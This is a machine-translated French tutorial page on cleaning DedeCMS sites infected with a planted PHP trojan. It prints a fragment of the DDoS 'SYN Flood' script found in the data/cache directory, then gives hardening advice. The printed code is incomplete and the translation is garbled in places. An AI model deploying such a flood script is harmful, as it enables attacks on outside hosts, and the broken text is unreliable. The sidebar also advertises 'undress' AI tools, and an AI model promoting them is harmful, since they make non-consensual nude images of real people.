Comment dedecms résout la vulnérabilité de montage de chevaux DDOS
Comment les dedecms résolvent-ils la vulnérabilité de montage DDOS ?
Dedecms est un système open source PHP bien connu en Chine, et c'est également le système CMS de premier choix pour de nombreux webmasters pour créer des sites Web. Sa simplicité et sa facilité d'utilisation sont une raison majeure de son utilisation. praticité répandue, et c'est précisément à cause de l'open source de dedecms que cela a également conduit à De nombreux pirates informatiques se sont concentrés sur ce programme, ils ont donc successivement recherché de nombreuses vulnérabilités dedecms. En conséquence, un certain nombre de sites Web dedecms ont été suspendus. Certains ont été prévenus par la salle informatique, et des salles informatiques sérieuses ont été fermées de force, entraînant d'énormes pertes. Aujourd'hui, nous allons faire une analyse plus approfondie de ce problème et trouver une solution.
Étude recommandée : Dreamweaver cms
Caractéristiques du cheval piraté :
Ouvrez la page d'accueil de votre propre site Web et vous le trouverez en consultant le code source De nombreux codes de lien noir ont été ajoutés à mon site Web. Le code de lien noir est le plus simple et le plus facile à voir pour les webmasters. Ce n'est rien de plus que le code des liens conviviaux.
Une autre fonctionnalité est que lorsque vous ouvrez le site Web, 360 Security vous indiquera que le site Web présente un risque de malware. Ce type de code malveillant est généralement un code frame ou un code js ou un code image. c'est que le site Web ne parviendra soudainement pas à s'ouvrir ou s'ouvrira lentement. Si vous vérifiez le trafic, vous constaterez qu'il consomme beaucoup de trafic, ce qui signifie que le trafic est envoyé, ce qui est également appelé attaque par paquets de trafic UDP. . Ce qui précède présente les caractéristiques générales des dedecm piratés. Parlons de quelques solutions pratiques et mesures préventives en cas de piratage de sites Web.
Tout d'abord, téléchargez le code du programme du site Web sur votre ordinateur local et utilisez l'outil de suppression du cheval de Troie sinesafe pour le vérifier. Il s'avère qu'il existe de nombreux chevaux de Troie de script dans le répertoire data/cache/. le script du cheval de Troie, j'ai trouvé des codes PHP inconnus, j'ai mis le code dans l'outil cheval de Troie sinesafe et j'ai effectué une analyse approfondie et j'ai trouvé les caractéristiques du cheval de Troie. Le code est le suivant :
Le code est. comme suit :
<?php
set_time_limit(984918);
$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_GET['time'];
$Sendlen = 65535;
$packets = 0;
}
echo "================================================
";
echo " <font color=blue>www.phpddos.com
";
echo " SYN Flood 模块
";
echo " 作者:ybhacker
";
echo " 警告:本程序带有攻击性,仅供安全研究与教学之用,风险自负!</font>
";
echo "================================================
";
echo " 攻击包总数:<font color=Red><span class=\"text\">".$packets." 个数据包</span>
</font>";
echo " 攻击总流量:<font color=Red><span class=\"text\">".round(($packets*65*8)/(1024*1024),2)." Mbps</span>
</font>";
echo " 攻击总字节:<font color=Red><span class=\"text\">".time('h:i:s')." 字节</span>
</font>";
echo "Packet complete at ".time('h:i:s')." with $packets (" .round(($packets*65*8)/(1024*1024),2). " Mbps) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
?>J'ai découvert sur Internet qu'il s'agissait d'un script php pour un cheval de Troie d'attaque de trafic UDP, ce cheval de Troie peut obtenir l'effet d'une attaque de trafic DDoS en s'exécutant avec l'autorisation du script du site Web. Aucune autorisation de serveur n'est requise. Ce n'est qu'à ce moment-là que j'ai compris pourquoi la salle informatique disait que mon site Web était toujours externalisé. Les sites Web exécutant ce script s'ouvriraient lentement, y compris mon site Web. Maintenant que vous avez trouvé le problème, vous devez le résoudre rapidement. Cliquez sur Effacer le code du cheval de Troie pour tout effacer en même temps. Il n'y a aucun nom de fichier inconnu dans le répertoire Data/cache/. Enfin, afin de guérir cette « maladie tenace », nous avons résumé plusieurs solutions et mesures préventives :
1. Paramètres de sécurité du répertoire dedecms : le répertoire data/cache/ templets uploads est paramétré en lecture et en écriture, mais pas les autorisations exécutables. Inclure, membre et plus définir les autorisations en lecture, exécutable et non en écriture Étant donné que dedecms n'utilise aucune procédure stockée, vous pouvez désactiver FILE, EXECUTE et d'autres autorisations pour effectuer des procédures stockées ou des opérations sur les fichiers.
2. Sécurité du programme du site Web : C'est également la précaution la plus fondamentale. S'il s'agit d'un espace virtuel, il est recommandé de trouver un professionnel de la maintenance de la sécurité du site Web pour assurer la sécurité du programme du site Web. le site Web peut apporter une source de clients sûre et stable.
3. Mise à jour du programme : ouvrez l'arrière-plan dedecms pour voir s'il existe des correctifs mis à jour. Si tel est le cas, veuillez les mettre à jour et les corriger à temps. Si votre version est très ancienne, je vous recommande de réinstaller la nouvelle version, car. Les nouvelles versions sont relativement sûres et diffèrent des anciennes versions à de nombreux endroits.
4. Répertoire de gestion du backend : dedecms Le répertoire de gestion du backend par défaut est généralement dedecms. De nombreux webmasters ne se soucient jamais de cette adresse du backend. Je suis très responsable de vous dire que si l'adresse du répertoire géré est celle par défaut, vous le ferez. être raccroché. La probabilité qu'un cheval soit présent est de %100. Il est recommandé de remplacer le nom du répertoire par un nom composé de chiffres et de lettres.
5. Mot de passe de gestion du site Web FTP : Il est recommandé de modifier fréquemment le mot de passe FTP et le mot de passe de gestion du site Web, car de nombreux pirates informatiques utilisent la force brute pour déchiffrer les mots de passe et rendre le mot de passe aussi complexe que possible avec des symboles et des lettres spéciaux. .
Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!
Outils d'IA chauds
Undresser.AI Undress
Application basée sur l'IA pour créer des photos de nu réalistes
AI Clothes Remover
Outil d'IA en ligne pour supprimer les vêtements des photos.
Undress AI Tool
Images de déshabillage gratuites
Clothoff.io
Dissolvant de vêtements AI
AI Hentai Generator
Générez AI Hentai gratuitement.
Article chaud
Outils chauds
Bloc-notes++7.3.1
Éditeur de code facile à utiliser et gratuit
SublimeText3 version chinoise
Version chinoise, très simple à utiliser
Envoyer Studio 13.0.1
Puissant environnement de développement intégré PHP
Dreamweaver CS6
Outils de développement Web visuel
SublimeText3 version Mac
Logiciel d'édition de code au niveau de Dieu (SublimeText3)
Où se trouve le modèle de réseau de ressources Imperial CMS ?
Apr 17, 2024 am 10:00 AM
Emplacement de téléchargement du modèle Empire CMS : Téléchargement du modèle officiel : https://www.phome.net/template/ Site Web du modèle tiers : https://www.dedecms.com/diy/https://www.0978.com. cn /https://www.jiaocheng.com/Méthode d'installation : Télécharger le modèle Décompresser le modèle Télécharger le modèle Sélectionner le modèle
Comment dedecms implémente le remplacement de modèle
Apr 16, 2024 pm 12:12 PM
Le remplacement du modèle peut être implémenté dans Dedecms en suivant les étapes suivantes : modifier le fichier global.cfg et définir le pack de langue requis. Modifiez le fichier hook taglib.inc.php et ajoutez la prise en charge des fichiers modèles de suffixes de langue. Créez un nouveau fichier modèle avec un suffixe de langue et modifiez le contenu requis. Videz le cache Dedecms.
Quel site Web les dedecms peuvent-ils faire ?
Apr 16, 2024 pm 12:24 PM
Dedecms est un CMS open source qui peut être utilisé pour créer différents types de sites Web, notamment : des sites Web d'actualités, des sites Web de blogs, des sites Web de commerce électronique, des forums et des sites Web communautaires, des sites Web éducatifs, des sites Web portails, d'autres types de sites Web (tels que des sites Web d'entreprise). , sites Web personnels, sites Web d'albums photos, sites Web de partage de vidéos)
Comment télécharger des vidéos locales sur dedecms
Apr 16, 2024 pm 12:39 PM
Comment mettre en ligne des vidéos locales à l'aide de Dedecms ? Préparez le fichier vidéo dans un format pris en charge par Dedecms. Connectez-vous au backend de gestion Dedecms et créez une nouvelle catégorie de vidéo. Téléchargez des fichiers vidéo sur la page de gestion vidéo, remplissez les informations pertinentes et sélectionnez la catégorie vidéo. Pour intégrer une vidéo lors de l'édition d'un article, saisissez le nom de fichier de la vidéo téléchargée et ajustez ses dimensions.
Comment utiliser les décms
Apr 16, 2024 pm 12:15 PM
Dedecms est un système CMS chinois open source qui assure la gestion de contenu, un système de modèles et une protection de sécurité. L'utilisation spécifique comprend les étapes suivantes : 1. Installez Dedecms. 2. Configurez la base de données. 3. Connectez-vous à l'interface de gestion. 4. Créez du contenu. 5. Configurez le modèle. 6. Gérer les utilisateurs. 7. Entretenir le système.
Rapport d'évaluation de l'outil de conversion dedecms précis et fiable
Mar 12, 2024 pm 07:03 PM
Rapport d'évaluation de l'outil de conversion dedecms précis et fiable Avec le développement rapide de l'ère Internet, la construction de sites Web est devenue l'un des outils nécessaires pour de nombreuses entreprises et particuliers. Dans la construction de sites Web, l’utilisation d’un système de gestion de contenu (CMS) peut gérer le contenu et les fonctions du site Web de manière plus pratique et plus efficace. Parmi eux, dedecms, en tant que système CMS bien connu, est largement utilisé dans divers projets de construction de sites Web. Cependant, nous sommes parfois confrontés à la nécessité de convertir le site Web dedecms vers d'autres formats, auquel cas nous devons utiliser un outil de conversion.
Un moyen simple d'apprendre la fonction de conversion de codage dedecms
Mar 14, 2024 pm 02:09 PM
L'apprentissage de la fonction de conversion d'encodage dedecms n'est pas compliqué. Des exemples de code simples peuvent vous aider à maîtriser rapidement cette compétence. Dans les dedecms, la fonction de conversion de codage est généralement utilisée pour traiter des problèmes tels que les caractères chinois tronqués et les caractères spéciaux afin de garantir le fonctionnement normal du système et l'exactitude des données. Ce qui suit présentera en détail comment utiliser la fonction de conversion d'encodage de dedecms, vous permettant de faire face facilement à divers besoins liés à l'encodage. 1.UTF-8 en GBK En dedecms, si vous devez convertir une chaîne codée UTF-8 en G
Quelles sont les failles des dedecms ?
Aug 03, 2023 pm 03:56 PM
DedeCMS est un système de gestion de contenu open source qui présente certaines vulnérabilités et risques de sécurité potentiels : 1. Vulnérabilité d'injection SQL. Les attaquants peuvent effectuer des opérations non autorisées ou obtenir des données sensibles en construisant des instructions de requête SQL malveillantes. 2. Vulnérabilité de téléchargement de fichiers, les attaquants peuvent télécharger des fichiers contenant ; code malveillant sur le serveur pour exécuter du code arbitraire ou obtenir des autorisations du serveur ; 3. Fuite d'informations sensibles 4. Exploitation de vulnérabilités non authentifiées ;
